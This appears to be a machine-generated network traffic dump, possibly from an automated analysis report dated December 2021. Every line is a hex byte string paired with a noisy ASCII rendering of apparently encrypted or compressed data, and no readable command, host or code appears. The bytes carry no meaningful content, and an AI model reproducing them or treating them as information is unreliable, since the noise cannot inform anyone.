                                                          2021-12-14 13:10:57 UTC194INData Raw: 50 c1 1c 5a 08 0d ca 09 46 25 79 94 a5 38 f3 43 2c 4f 99 0f 4a 73 17 25 53 4a b5 ae 50 c6 69 78 57 7e 03 35 ed 29 f3 ab bb ae f9 f3 b0 ea c7 c6 65 9a b6 92 49 81 2e a7 98 da 4c 6f fa 6f 3c 3f 89 ef 41 00 07 b8 6e d0 d6 d4 f1 7e 78 2e 47 33 28 79 90 0c 14 15 15 07 cb b9 64 9d 3f 5a 50 9b bc f8 ff b3 e3 8a 05 1b 72 11 79 71 eb b4 1d ed fd 65 8e 83 be 54 30 a8 1d 9b dc 84 bc da c2 fc b0 51 71 5a 65 fb e9 a8 a8 74 3c ba 31 f2 8d b5 a5 29 e4 7c d3 d0 8f 85 74 44 c5 b7 50 f6 7f f7 cd 86 f7 ca 9d 79 91 93 69 1c b4 ac 6d 26 64 b0 fa aa 53 73 1a c8 48 87 12 c3 bb 48 87 84 56 80 91 4d 7a 86 34 ac 6f 2c a2 43 06 a9 cd d8 65 a2 e9 41 d6 7e 72 71 d7 00 05 31 3f 79 8f e1 f3 6b 70 c0 14 84 5a c4 fa db 3e 96 b3 b7 c1 b1 45 31 a3 0d 92 d3 35 2c 04 4f c4 c5 38 e6 ad de f1
                                                          Data Ascii: PZF%y8C,OJs%SJPixW~5)eI.Loo<?An~x.G3(yd?ZPryqeT0QqZet<1)|tDPyim&dSsHHVMz4o,CeA~rq1?ykpZ>E15,O8
                                                          2021-12-14 13:10:57 UTC195INData Raw: 57 ec d6 4d dd 9c 04 bb f7 8c 0c 37 5f ab cb ee a3 0b 3c c4 31 9d 08 8d f3 c0 ce 1f aa 43 9c 8b ff 26 a8 cc 17 7b c3 7e a6 c4 33 0d 52 47 5d 70 2e 34 46 ee 3d 63 ea e6 84 ee 0a 1c 8a a7 86 5b 7a 8e 84 ee e1 00 d7 83 f3 a8 e5 09 3b 57 45 f9 5c 7b ef de 41 3a 79 b2 2f b7 af b6 f1 ad 6d cb 83 ed 2c 98 26 33 d1 2a f5 3f c1 77 cd d1 1e aa 0f 8f fa 88 d5 b8 ba bb 0f 6b 7e 12 a3 44 b8 4b 8c 49 f4 ad a6 79 94 42 ed 12 a6 c9 81 29 bf 7d 36 1e 06 03 15 22 cb 8d 79 45 e7 56 5f 46 0e a1 18 e3 82 17 00 95 96 cc 3c d1 1c 2e ae 86 5d 74 aa f1 46 27 60 5f b3 f8 1f 84 3d 53 ab 0e 6b e6 fb 2a 7f b6 8a 42 f0 c2 59 7a de 44 96 7e 1a 22 d1 6a 39 d3 94 67 a9 cc ce 50 5b c3 da 16 45 1b b6 03 ae bd e8 bd 43 c0 74 63 ac cf ba 32 69 a4 27 95 bd 88 c4 17 e2 6f e7 09 38 b2 b2 ea 6b
                                                          Data Ascii: WM7_<1C&{~3RG]p.4F=c[z;WE\{A:y/m,&3*?wk~DKIyB)}6"yEV_F<.]tF'`_=Sk*BYzD~"j9gP[ECtc2i'o8k
                                                          2021-12-14 13:10:57 UTC197INData Raw: 78 16 e8 ff e1 a5 f3 66 75 57 8a 31 68 09 a6 44 e2 1a f4 34 08 b0 b4 0c 17 46 38 99 bd 58 16 05 dc ea eb 52 a4 d7 5b 07 59 cb 6e b2 24 52 c1 a7 7b 05 42 03 1a 98 4a bb 72 3a 70 51 0d 45 af 75 93 68 19 a4 7f 0c 60 ef 4a 49 aa b0 fb f8 96 15 eb ce 93 67 fd 12 93 7a d7 2f e4 3c db 79 39 f8 2a 92 3e bc b9 40 47 a8 b9 55 86 d4 b3 6e 0b 52 67 10 33 a0 1d 91 53 5f 43 e9 67 ea b9 07 cb c2 38 71 9b da ae 01 d7 cc 8a 62 4d 8d 77 56 71 ab e3 3e ac d1 65 cb d4 9a 13 1c a8 59 cc f9 c1 96 da 8b ab 96 32 5b 5a 05 ac ce c9 80 74 59 ed 19 95 a5 b5 c1 7e cd 19 05 d0 cd ed 2c 11 44 fa 25 80 42 b3 ef ee 89 8f 6b 2c da d5 00 1c c9 f7 d8 66 0d b0 ff f1 e4 31 73 c8 4d dc ab 8f d2 48 a2 df ed e6 fd 4d 6d dd 08 cb 0e 2c bf 18 a9 cf d8 d8 42 fe 46 03 d6 7e 60 31 a5 44 21 28 09 39
                                                          Data Ascii: xfuW1hD4F8XR[Yn$R{BJr:pQEuh`JIgz/<y9*>@GUnRg3S_Cg8qbMwVq>eY2[ZtY~,D%Bk,f1sMHMm,BF~`1D!(9
                                                          2021-12-14 13:10:57 UTC198INData Raw: 0b 45 4e 9b ff 40 87 98 8e a4 6a 74 75 88 4b 19 79 fb b1 1a 3b 26 8f 6b 60 06 25 f3 a5 eb ee 1c fc 40 c8 47 f3 cc 42 bf e8 33 a8 f3 8f 35 10 5a a0 af c1 a9 14 2c 87 54 a7 37 8d ef da e3 41 ce 6e d1 89 d5 05 88 e8 50 07 9e 1a 82 a0 1d 01 4e 60 01 26 4b 5f 44 f9 27 59 d3 bb df 8d 28 11 8c d5 8e 4d 61 b7 b2 a9 d1 2c d7 d4 a8 c9 fe 2f 30 4c 15 a4 38 4c 8a f6 56 3b 55 a4 2f d1 f3 df c6 ad 5c e7 ed cf 7e df 4a 15 f2 39 f4 13 af 64 9b 97 41 8b 13 a3 c7 99 96 eb c8 91 1e 77 6e 1c a3 55 b8 69 b9 52 e3 a8 94 0a b5 5f d1 13 bc c3 bc 2d bd 65 24 4d 72 3f 33 7e a7 bd 73 62 fa 4a 4e 15 3a c7 2f 86 a5 01 26 96 ab 97 69 b6 2d 41 b4 8d 47 26 d3 94 78 10 34 38 84 9d 33 81 01 76 88 1f 29 a3 9a 19 75 e3 82 48 e0 a1 0e 14 eb 44 f7 59 21 29 c1 3e 61 a7 a9 69 8c e1 db 02 05 a6
                                                          Data Ascii: EN@jtuKy;&k`%@GB35Z,T7AnPN`&K_D'Y(Ma,/0L8LV;U/\~J9dAwnUiR_-e$Mr?3~sbJN:/&i-AG&x483v)uHDY!)>ai
                                                          2021-12-14 13:10:57 UTC199INData Raw: 30 22 f1 aa 3a 07 b5 ac 49 ca d9 79 6f 98 c0 86 12 76 ec 34 6b be 23 d7 cc 54 6d 61 cb 57 3c 58 68 2e 53 7e 33 89 c9 d4 d7 e4 4b 05 76 de 42 48 29 f9 63 c0 7b c7 01 7a ac 99 7c 13 12 7f 9e 9d 0c 0c 21 b9 8e ec 3d a2 e8 3e 15 59 b2 79 83 24 63 f1 d3 67 13 2d 29 3b fd 61 9a 26 05 55 34 4a 56 c6 51 a3 3b 10 90 0d 0b 35 ac 46 71 da b5 dc 9d f3 10 9f da 92 08 c9 33 e1 4d e2 5b d2 18 be 3d 08 9d 1b 9b 77 94 99 21 72 97 d8 73 a4 97 a1 67 0b 78 5c 23 33 b4 1d 91 53 55 60 9b 74 d9 d7 11 de b7 37 53 ee cc 9d 01 f1 fb fa 70 6e ff 75 00 30 99 c4 52 86 e5 04 fb ea f5 38 09 c9 6c fe f9 c8 a0 b7 a6 b3 f4 39 69 39 13 b8 a1 c6 bb 11 5e ce 70 9f 9c f7 c6 5a a8 7e 1a a4 fa f5 09 23 26 e5 2f 85 57 9a e8 f1 89 ca 54 1e ae c5 3d 6f fa c0 b6 51 30 b0 f9 c5 8b 04 4e c8 4e ed d8
                                                          Data Ascii: 0":Iyov4k#TmaW<Xh.S~3KvBH)c{z|!=>Yy$cg-);a&U4JVQ;5Fq3M[=w!rsgx\#3SU`t7Spnu0R8l9i9^pZ~#&/WT=oQ0NN
                                                          2021-12-14 13:10:57 UTC200INData Raw: 79 ff cd 04 c0 00 78 b5 2e e6 cf 5b 2d 16 ba b2 49 be 17 95 1b 86 94 65 3d 0d ea 7a 82 d8 38 80 b8 3b de 3c 59 3d 9c ff 59 f6 81 89 b2 6a 15 57 88 49 1b 34 e7 b0 0b 64 26 8f 6b 60 06 25 f3 e8 ca ef 0e b0 62 ce 5b c1 d1 43 88 f5 2f aa 92 b7 2c 39 06 80 c1 e1 a9 1d 35 9b 56 d4 03 81 f4 f1 c0 4d c5 6f b8 a4 db 75 b3 f4 51 3e 94 13 c9 e4 37 0d 55 47 00 25 00 16 4e fd 34 6f e8 b2 b6 a8 35 1a 84 97 88 5b 70 de c4 93 c2 1b d0 de a6 a8 c4 15 1c 44 05 ae 6a 1d d9 cb 57 06 5e bb 5b c1 ee d5 c4 b2 5d c6 8c ed 7e f9 52 13 dd 25 f6 76 fa 6d 9b 90 7d 9f 10 a3 d0 9d 92 eb e9 84 18 7b 46 14 cf 75 b2 6c 83 4c e9 ac f0 2a a4 59 e7 08 a8 a6 a8 2d b9 54 24 45 70 3b 01 74 9b ab 79 76 c7 54 4e 23 4e d3 23 e8 84 73 0a 94 8f 8a 69 a3 2d 12 93 9a 40 2c f9 f1 5f 0c 06 2b 93 f4 10
                                                          Data Ascii: yx.[-Ie=z8;<Y=YjWI4d&k`%b[C/,95VMouQ>7UG%N4o5[pDjW^[]~R%vm}{FulL*Y-T$Ep;tyvTN#N#si-@,_+
                                                          2021-12-14 13:10:57 UTC202INData Raw: 66 de fe be 6a 61 32 ce 09 5b 02 9a e9 88 fe 5c 2b 8b 41 83 da 46 f9 78 8b e5 c0 4d a9 61 c3 4d cb c4 d0 37 2d e1 8b 20 1f cc be 56 a5 ee 7b 0c b3 c1 d2 2e 6b 89 72 44 d7 0a de 98 73 54 18 fd 5b 50 5a 5e 2e 7e 7a 24 85 bd d2 c0 c4 6d 37 72 ad 54 7e 29 d4 67 d7 77 b3 27 6d 8c b2 69 05 62 57 95 9a 3d 26 25 ae eb de 3f c1 c7 3e 07 61 aa 7d 83 77 64 e6 c2 59 3d 42 20 2a ec 50 ab 1c 18 6a 37 19 64 dd 58 a7 05 78 b2 0d 17 45 9b 46 4f de a6 cb 99 9e 40 ac cd b2 35 ff 36 e6 5d f2 5b f4 1e a9 58 0e 95 6f 89 5b 97 80 32 79 ad cd 6f b5 b5 b9 0b 18 68 5a 19 7f 83 19 97 6d 7b 15 8e 63 c8 e6 32 cd a3 29 46 f6 be 9f 64 c6 c5 da 65 69 ec 7d 00 13 84 b4 5d 82 86 01 e2 83 fd 33 3f f7 56 ef 9c eb c1 a9 a6 88 c9 1a 78 3f 0a fb 98 cb a2 18 49 fd 7c 84 bb c1 c2 44 cd 19 37 a4
                                                          Data Ascii: fja2[\+AFxMaM7- V{.krDsT[PZ^.~z$m7rT~)gw'mibW=&%?>a}wdY=B *Pj7dXxEFO@56][Xo[2yohZm{c2)Fdei}]3?Vx?I|D7
                                                          2021-12-14 13:10:57 UTC203INData Raw: 9f 34 36 ed a0 86 50 80 f4 0b 07 4c 9d 0e de 32 77 17 60 f6 3a 41 1e 85 8a c3 b9 0e 52 a7 5a 4e 29 b1 dd 72 ba f2 00 a5 38 6b dc 20 ef cf 70 24 60 b8 b9 20 be 3f e5 19 91 81 4e 1e 12 e1 58 fa dd 3a f0 ab 35 b1 01 20 1d 87 f9 5f bd a1 a4 b8 6c 11 43 95 4e 13 5a 94 94 0d 5c 03 83 6a 6a 1b 0e ec 8b e1 fa 0d 95 6c d4 3e e4 dd 59 b3 d8 24 be f1 90 11 0f 4a ac c0 ec c6 0a 39 81 6e 90 21 97 e3 c6 c7 5e de 62 be a4 bc 12 85 f9 7d 19 85 1f 93 d5 36 28 47 5d 0d 30 47 2f 57 f5 3c 68 86 86 cf 9d 33 10 84 fb bb 5d 7b 9c 99 ad d3 47 fa df af db e4 08 3f 4c 18 ae 38 6c f2 da 46 1a 44 b5 34 ea 9d f3 cb b4 51 f0 82 f7 1f f9 52 13 dd 25 f6 35 c0 6e 8e 82 6c 97 13 a9 fa fc b4 ff d4 f0 0d 77 5c 2c 8c 45 af 77 a6 45 ff 89 fb 0e be 2b e9 03 bb f9 bc 20 a4 62 22 67 63 23 31 7e
                                                          Data Ascii: 46PL2w`:ARZN)r8k p$` ?NX:5 _lCNZ\jjl>Y$J9n!^b}6(G]0G/W<h3]{G?L8lFD4QR%5nlw\,EwE+ b"gc#1~
                                                          2021-12-14 13:10:57 UTC204INData Raw: 50 14 31 4a e1 e0 21 9a d4 bf d9 f6 1a 49 3c 62 7a 83 e3 69 8f 23 7c 12 5c 89 5f 54 b3 ce 35 fb 0f 95 2e 66 c2 c4 9a 66 7f 53 d0 09 5b 38 bb 8c ae e5 5a 27 8d 38 91 c1 5d ce 78 86 fc c9 3f ae 61 c5 12 cc c3 df 34 33 fd 9e 3c 01 a1 9d 4f d1 c8 64 0c 90 c9 a6 34 45 e6 59 59 a2 39 d6 ea 3b 6a 7d c9 44 59 4d 4e 35 61 6f 30 9c d8 c7 a5 d7 57 01 4c 9a 5f 5e 0f c3 71 d9 76 c5 05 7a f8 93 69 02 4d 7c 95 9a 0a 10 22 b3 e2 c9 37 b3 83 08 04 79 88 65 8f 54 72 fb c6 4a 34 14 2e 2a ef 6a 9c 72 28 4a 1d 25 67 ca 4f c6 0e 0a f1 18 1c 35 ac 41 6e aa 90 c7 8a f3 06 87 c7 a9 15 9a 04 e1 5d e0 5b c2 3a a9 52 05 9d 0c b0 7b 88 9d 2f 72 fe fa 71 b5 b5 a6 5b 0d 62 44 23 50 a7 3d 97 7e 79 67 e9 55 d9 cd 35 ef ad 31 42 f8 ca bd 73 c0 f5 f8 04 48 e2 73 6b 14 9d f1 4c 9d e9 17 8f
                                                          Data Ascii: P1J!I<bzi#|\_T5.ffS[8Z'8]x?a43<Od4EYY9;j}DYMN5ao0WL_^qvziM|"7yeTrJ4.*jr(J%gO5An][:R{/rq[bD#P=~ygU51BsHskL
                                                          2021-12-14 13:10:57 UTC205INData Raw: f0 9e fe af b0 41 57 9d 5d 45 22 0d f9 b4 a5 13 85 4d 8a 89 f6 f1 8c bb 78 f8 38 75 ee 2a 47 37 eb 27 a7 97 29 2c b7 bd 96 43 ba fe 38 14 67 82 1b e9 2f 67 01 79 ed 3d 5d 70 e2 ae c5 81 32 51 a1 58 4f 03 a1 f8 70 b8 e6 0c a2 29 73 fa 3f e4 bd 58 3e 7f b6 bb 3a da 03 f0 08 bc a9 54 14 11 fa 79 e7 f7 31 c7 b3 33 bc 0e 4c 01 98 ff 46 b9 a1 88 af 61 07 33 b2 5e 0f 40 f1 b8 51 78 19 82 63 61 0c 3f fd 87 ea f9 79 8f 66 ce 61 ce d9 55 85 f1 34 a0 d3 97 0c 10 53 a4 db eb a5 2b 39 91 58 a6 21 87 f4 dd c1 40 d9 0b 82 be ce 1c 8e ea 71 3a 9d 17 93 ef 35 18 4b 41 00 31 2e 0d 46 fb 36 7e c9 a5 c2 87 28 1b 9a d5 8e 4d 61 b7 b7 b2 d9 1c c9 c3 c1 cf f5 0e 01 66 1e aa 2e 5a 8a f8 40 1b 73 b4 3a f6 ee b6 e2 a7 4c cb 80 f8 78 cf 63 0f d7 24 f5 13 dd 70 fe b0 67 8d 14 a3 f9
                                                          Data Ascii: AW]E"Mx8u*G7'),C8g/gy=]p2QXOp)s?X>:Ty13LFa3^@Qxca?yfaU4S+9X!@q:5KA1.F6~(Maf.Z@s:Lxc$pg
                                                          2021-12-14 13:10:57 UTC207INData Raw: a8 fa 4e 7f 8b d2 a1 87 c9 27 be e6 b9 48 9f e6 be 76 9c 9d 74 d1 35 cc be cf 8b 56 d6 cb c8 0d 2b c8 4d 42 23 37 4d d3 fe 30 fb d3 bf df a9 1b 55 1e 75 55 81 f4 6e 98 73 4a 05 5f a7 56 49 b3 d2 41 be 32 9b 35 72 e4 da a3 62 63 46 bd 3f 56 2e bd e9 86 a5 63 23 91 59 b4 cd 44 e8 79 9c 8a f4 20 b6 41 db 77 e3 cf df 21 41 c5 ac 27 12 af 94 56 c0 c3 62 0c b2 c2 a4 02 74 e6 5a 44 b2 23 c7 98 63 54 74 ff 5d 5f 4a 60 3f 62 6b 45 8f d8 c1 fa e0 53 07 76 b0 45 2d 1a c3 76 e6 7b c1 05 66 8c e0 6b 13 66 67 b8 9c 2a 07 34 b2 fa bf 1b 91 c6 35 05 5d a4 60 88 50 10 f3 c2 4c 0f 0e 28 2c f9 63 ab 1c 18 75 3e 23 7e db 3d a1 0d 0c ae 3c 01 40 81 5d 1c cd b1 da a7 a7 29 88 c3 85 08 ef 29 e7 38 c6 4a d3 29 b3 5c 1d bb 00 b1 50 8e ef 05 6e 9a f8 7e b3 b1 a4 7f 7f 4f 4b 21 5a
                                                          Data Ascii: N'Hvt5V+MB#7M0UuUnsJ_VIA25rbcF?V.c#YDy Aw!A'VbtZD#cTt]_J`?bkESvE-v{fkfg*45]`PL(,cu>#~=<@]))8J)\Pn~OK!Z
                                                          2021-12-14 13:10:57 UTC208INData Raw: e7 89 3c 98 c2 8b 24 ee 24 6a ab 89 67 7e 18 e6 cc 6e ba 32 dd 83 4f 5f 6d 4b 2b 79 17 0b 02 15 87 46 dd ea ea c3 ef 80 33 6d 82 47 5e 24 16 f6 b7 cd 29 ea 44 99 98 db c3 96 a7 73 e6 5a 4a ee 59 74 37 f2 4c 8b 97 32 2d ed 86 9d 43 8e e1 2a 03 4f 98 07 e2 4a 73 17 64 dd 12 4a 14 f7 ae c2 ad 3d 5e af 5d 56 1e c4 fc 6b 93 fe 0a b0 24 66 b5 0e ef b6 39 08 7a b6 b6 22 99 1f e5 05 e3 b3 43 04 09 ea 70 ac ec 2a ee ab 35 b3 0a 0e 1d 8d e8 5d b9 b9 88 ba 6e 00 5a 8e 49 52 72 fb a7 12 5a 02 9a 6a 76 1c 65 d6 81 ea eb 0b 85 03 dd 5b f7 e7 79 83 e8 20 a1 c2 8a 01 0c 57 a6 ce ee 8b 1c 31 9a 43 ad 44 a7 f2 d1 cf 5a cf 4f b8 b8 d9 16 94 e2 50 33 f1 19 82 d4 1a 3e 47 49 07 31 5a 2d 5a 9c 34 63 f2 8a f5 8f 37 14 8a bc 9d 51 15 b9 85 a1 da 00 cd c9 c1 c7 e0 25 1b 54 03 aa
                                                          Data Ascii: <$$jg~n2O_mK+yF3mG^$)DsZJYt7L2-C*OJsdJ=^]Vk$f9z"Cp*5]nZIRrZjve[y W1CDZOP3>GI1Z-Z4c7Q%T
                                                          2021-12-14 13:10:57 UTC209INData Raw: cf 3b 0f fd f9 c9 5c c4 97 81 9b 99 07 cf 0c 6d 99 bb 24 2e b6 e1 3b a9 ba 9f 0d 29 6b b4 e4 94 d0 41 a3 cf 8f 21 03 85 bb c6 f7 96 62 d9 8e de 3d f2 80 3e ae d3 eb 0d bf 4b 8c be b9 de 3a b0 4b 18 7b 4c 8b 23 28 18 56 3e a7 93 4a fd a0 d9 aa f8 40 24 7c 07 16 e7 9f 11 6c d6 1e 66 2f 89 3c 00 d4 ae 58 b0 63 f3 61 00 a6 b8 d6 03 0d 33 b5 62 29 5a ca 90 e6 9a 0a 46 ff 39 dd a1 2c 8d 17 fa 0a 6d 48 fa 04 a5 92 4b ae b1 54 4c 8a db 53 73 d0 ec 3c a3 a3 04 8c 3a be 52 ba 14 09 e1 3b 57 94 bd 9e 3b 38 0a 3b ef 32 3a 0d 5a 1e 9f a0 ee 9d b4 a4 a2 b2 90 17 fe 30 2c 55 a3 22 b6 08 33 b1 0d d8 e0 1e f6 c7 3e db e8 59 67 d1 09 9d b8 5a d3 03 96 73 8d 1a 1b 66 f1 0d 91 b5 b8 a1 4a 5b 47 9b 2f ee 78 76 05 52 4b 1e be bd 33 79 f8 08 7b 6e 34 e7 35 1b 8a d7 a6 e5 f6 48
                                                          Data Ascii: ;\m$.;)kA!b=>K:K{L#(V>J@$|lf/<Xca3b)ZF9,mHKTLSs<:R;W;8;2:Z0,U"3>YgZsfJ[G/xvRK3y{n45H
                                                          2021-12-14 13:10:57 UTC211INData Raw: a1 b8 05 6a a9 79 72 ba e9 1b 4b 26 e0 53 9c 22 45 46 d2 66 94 cd a5 1e 0d bd b1 ef 05 e4 d7 53 38 ce 9d 8c 43 90 e4 e2 d9 53 08 9c 1c ff fb 0c b4 a8 97 d9 1a 42 eb bb e8 ce c9 1c 18 5c 1d 68 a5 84 7e ea 35 8f 82 9f a8 40 02 48 14 f6 31 3f 4d 76 16 f2 ad 51 e8 24 fc ef 8c 8a f5 da 1e 8a 1a 20 97 5a 3b 5c 88 03 f2 e4 56 5f 9a e1 e2 a5 f6 9a 5c 46 20 f4 63 93 4f 14 70 1e 8c 5b 24 77 80 c9 a3 bb 73 22 d0 51 32 42 c3 a0 10 f1 84 7e c5 5a 9f 78 41 93 ff 2b ca e6 d7 c9 5b 5a a5 87 fc 32 f2 ba a2 6f 0f c4 90 d7 4e 01 e6 41 d0 6b 20 4f e6 92 32 f8 d4 e0 d2 8e a9 35 c1 26 7d 25 15 30 7a 3b 74 e0 07 0a 69 4c 97 e6 99 84 71 f9 23 ba 2c 02 51 2e ec 9c 59 c5 92 e1 70 67 2c 44 32 8a c2 79 5d fd 29 d1 44 e5 82 a9 ab 2b aa 09 d8 c3 b5 7c e0 89 20 52 ec 77 ee b0 4c 6e 08
                                                          Data Ascii: jyrK&S"EFfS8CSB\h~5@H1?MvQ$ Z;\V_\F cOp[$ws"Q2B~ZxA+[Z2oNAk O25&}%0z;tiLq#,Q.Ypg,D2y])D+| RwLn
                                                          2021-12-14 13:10:57 UTC212INData Raw: 01 f8 ba b4 71 75 db 9a 46 01 50 ec 4f ef 8e d4 93 57 a7 1b 1e eb 87 eb 7c 41 b5 91 92 90 b5 fe 39 d0 51 da 33 04 e7 f7 cd 56 dc 8a 8a 95 89 15 40 36 7e 92 b6 19 29 bf ed 2b a7 9c 99 0e 2a 6b d1 e8 b1 f1 40 bf 4b d6 2a 0b 8a a4 44 13 84 e1 8e 86 df 39 f1 90 b6 37 d4 ee 09 bd 4b 9b d3 b4 ee 32 a8 cc 86 7c 59 98 a3 a3 70 5c 36 af 95 47 ea 20 0e b9 74 13 2e 73 07 16 e4 9f 10 fe f1 40 65 1d e4 2b a2 b7 ba 35 bf 70 76 95 0c a1 b6 cb 06 1f b3 5c 68 0f 5c c8 90 ed ab 2f 43 ed b9 32 ae 29 8c 16 fa 08 c9 5d dd 03 a6 92 6e bb 31 81 5c 81 d0 4f 7b de 7e 6e a0 8d 17 04 ea a9 c2 6b 03 98 b4 c9 c5 cc 52 96 33 2b 98 73 20 bc ff 05 5d 08 17 58 ed a0 b0 ad b5 32 74 0e db 33 23 5a a0 1f b3 12 ae 65 15 fd fd 09 67 92 ec fd e9 59 67 d3 81 80 b3 52 c5 9e 5e 70 8d 17 18 66 f0
                                                          Data Ascii: quFPOW|A9Q3V@6~)+*k@K*D97K2|Yp\6G t.s@e+5pv\h\/C2)]n1\O{~nkR3+s ]X2t3#ZegYgR^pf
                                                          2021-12-14 13:10:57 UTC213INData Raw: f8 6b 39 fd 02 9c be d5 08 41 c1 96 6c ad ab 45 16 94 89 86 4a 34 d2 58 a7 a1 9c c4 39 a8 5a 59 97 6c a1 b5 bd 12 fa f5 54 78 c1 7a 47 60 a1 80 43 1c 19 d6 09 06 48 98 de 35 42 a2 c6 22 3b 1d 45 fc 5a 22 56 4d 9e c2 4b 63 23 dc 61 89 5f 9b 3a f2 0b 27 ff 96 ce 19 42 1b b4 fc 6f 0d 06 ba 82 12 7e 05 50 6c f8 3c a8 88 86 a6 dd d1 c3 c9 ee 2f 29 5f 7c 9f cf a1 50 eb 25 e4 e8 84 83 eb cc 12 8b 39 23 8f 5d 13 53 87 11 f7 f2 50 44 81 e0 f4 21 da 80 d8 ff 23 e8 ea db 44 1a 7c 02 eb 5f 2e 72 90 d9 30 47 7a 2d 43 74 34 69 d6 b6 19 ea 98 e2 59 49 0d 34 0f 9d c1 37 58 7f d1 c8 47 d3 70 96 61 ed ee 34 66 ff 76 33 85 af 4a 92 5e c5 df 7d a1 0e fd 88 b5 41 d4 ef d5 1d f5 aa e0 35 fd 74 9a db 62 3e 78 fc 8f a4 7d 22 9c e6 8a 98 f8 bc 11 d3 36 9e b6 25 c0 9b 4f d8 80 63
                                                          Data Ascii: k9AlEJ4X9ZYlTxzG`CH5B";EZ"VMKc#a_:'Bo~Pl</)_|P%9#]SPD!#D|_.r0Gz-Ct4iYI47XGpa4fv3J^}A5tb>x}"6%Oc
                                                          2021-12-14 13:10:57 UTC214INData Raw: 16 6d 5b 51 ef 93 6c 61 28 07 cb 67 54 de f5 76 0d ed de 2f 8c ee 61 72 a3 26 ef 0f 41 cd 3c 5a 1d 52 80 06 ee b7 a8 e0 f4 c2 80 da 44 56 eb 45 e1 92 d3 83 4d ba 1f 0a fd 92 e6 7c 59 b6 91 e6 9f d9 fe 2c c8 5a c2 33 09 d3 f6 cf 51 f1 90 94 88 8b 85 58 03 71 16 fe 11 3e 36 64 22 bd 1b de 02 29 86 2c e3 a9 df 4e b3 ca 92 21 03 85 bd ca ee 98 71 5a c0 d6 35 fb 91 bd 2d b4 e6 10 b1 5e 90 d3 b4 fa 1a a2 d6 86 78 4c 89 3e 34 7f 4e 39 a6 90 4c e9 22 df a3 e9 49 2a 6e 15 95 7f 90 12 6d 33 08 72 bc 7d 3b 32 57 fc 3d b0 6f f8 4f 0c af a4 4b 47 1f 5b b5 6b 2f 5f c7 82 fa 08 07 71 f8 36 c6 ba a8 14 16 fa 0b ec 5f be 0a a2 00 0f 33 b0 47 c0 c4 d6 41 f2 8c f2 35 a6 b8 07 8e 46 ae dc 7e 14 0b 3d 2b d9 43 a6 89 b9 88 1a b5 3c 34 31 05 57 0b 15 4b f4 a1 a9 b9 b8 3a 69 0e
                                                          Data Ascii: m[Qla(gTv/ar&A<ZRDVEM|Y,Z3QXq>6d"),N!qZ5-^xL>4N9L"I*nm3r};2W=oOKG[k/_q6_3GA5F~=+C<41WK:i
                                                          2021-12-14 13:10:57 UTC216INData Raw: a7 27 fc df fc 67 c1 0d e4 4a 41 40 a2 58 77 be f4 94 03 ac c4 06 69 5b 0e 59 0e 0b ef d0 08 52 a0 af bb 65 ee 2a da 8b c4 a5 d2 98 c9 5a 86 ff 05 e5 50 0b 97 88 0f 4b 29 c8 29 a7 a7 88 d6 37 27 06 53 0e 6e 2d 75 a0 08 52 2f 5c 75 c1 79 03 73 32 41 12 93 2d c1 9e c9 c7 0f cd a5 1e f0 bd b0 f2 11 c1 c7 3b 24 40 40 90 d0 d8 a1 d0 58 51 87 50 1c d7 f2 19 31 60 9a d1 0d de 37 b2 fd 4f 0d 09 3d 4d 9c af 16 56 62 ea 26 bd 02 07 bb d3 42 01 01 e0 b2 a8 42 76 16 87 b7 d0 7b 31 7c 7d 8a 90 65 45 0a 85 36 34 16 19 3b 4f 94 89 62 fa 4c 4a 19 7e ee 38 d2 8e 44 64 25 da 6a 86 58 94 e3 1e 84 73 2e 6d 97 4b 20 fb 7c 30 d7 26 bb fe c5 a3 9f bf 9f 71 41 d1 1e a7 ce c1 c1 24 44 18 d7 db 47 c8 f1 d5 72 ed f2 53 6a 7e 87 00 8c 9a 58 8d ca 4e 5f f6 21 5c 69 da 21 ca 54 78 c1
                                                          Data Ascii: 'gJA@Xwi[YRe*ZPK))7'Sn-uR/\uys2A-;$@@XQP1`7O=MVb&BBv{1|}eE64;ObLJ~8Dd%jXs.mK |0&qA$DGrSj~XN_!\i!Tx
                                                          2021-12-14 13:10:57 UTC217INData Raw: 19 4b 29 0e 47 68 14 c3 de 36 11 b3 3d 36 6d 3f a7 6a 87 f1 f1 14 f5 e6 fc 1a 51 ad 45 e1 fa a9 82 9a f7 19 e2 24 5b e7 8f ff 01 6d 1c d8 68 da 18 fd 79 12 f1 43 c9 8c f6 4f 7a 9e a1 12 1c 54 4e b7 da 7e db c8 28 e1 b0 3b 10 7f 42 e3 5d 24 59 e7 59 6e fe db 8c 41 b5 91 d7 fb 9f ce 74 43 24 d0 a0 ad b1 f7 36 55 99 cc 3c 0c ee e5 47 97 c2 b7 8c 9c 97 0c c9 0a 43 92 bf 0a 24 b9 f3 2b ab 9c 8c 8e 66 ec 11 e2 b5 c3 c2 f3 c1 89 02 0a 8a a7 47 5a 93 43 db 92 5b 94 fa b2 bc 2d 5f 73 1f 3d f7 82 d3 9c fc 3b bf d9 05 b6 44 8f 25 3b 63 d3 df ae b2 45 e9 21 3b b9 74 d3 3c 7c 17 16 e8 9f 1d e9 7b 13 72 bc 05 38 32 54 e9 27 d7 70 76 a1 0a bb aa d6 0f 05 12 bf 64 32 58 d8 0f 46 a6 29 58 ea 2a 52 31 28 83 19 e6 84 b1 43 d8 0a bf 1c 80 b6 a3 d4 dc 8c d6 5b 7b c2 f4 35 b8
                                                          Data Ascii: K)Gh6=6m?jQE$[mhyCOzTN~(;B]$YYnAtC$6U<GC$+fGZC[-_s=;D%;cE!;t<|{r82T'pvd2XF)X*R1(C[{5
                                                          2021-12-14 13:10:57 UTC218INData Raw: ea ba 39 e5 84 77 0c 5e 93 5c 41 b4 18 91 f3 8c c2 fa c3 f5 95 73 0c 5d 63 fd df 2a 3f 76 3d ba 1b f8 f2 35 15 41 cd 0a 52 a4 8e f5 5e 35 44 8d 4a d9 27 da 86 f5 ec bd 13 0c da b9 58 68 8a c7 d8 47 55 df ba c7 e4 1e 2b a7 0a ea ab b5 8a 27 c3 f2 ed f0 a5 28 0e f7 08 81 56 4f da 2f a9 c4 80 f7 25 c2 46 28 8f 0d 23 1c a5 2e 78 5c 4c 0f d3 8a 9a 02 20 b2 52 f2 30 ae 8b be 46 f5 cc c3 9f 9e af 5f 52 7e c4 b2 52 05 4e 3c 9e ad 59 93 c2 bb 41 fb 4d 76 df 8c 1e 46 7d fa cc 7a c3 1d ba c3 4f 22 14 0d 5f 32 7a 16 51 5f e4 47 af ec 9e c8 c1 ee 41 63 f2 5a 31 2d 64 a4 c7 97 50 c7 23 cc ec aa 82 d1 d4 38 8b 0b 26 b9 59 05 52 a8 09 89 f2 38 58 e9 ef fb 23 ca 8f 5c 7a 2a f4 63 9f 6a 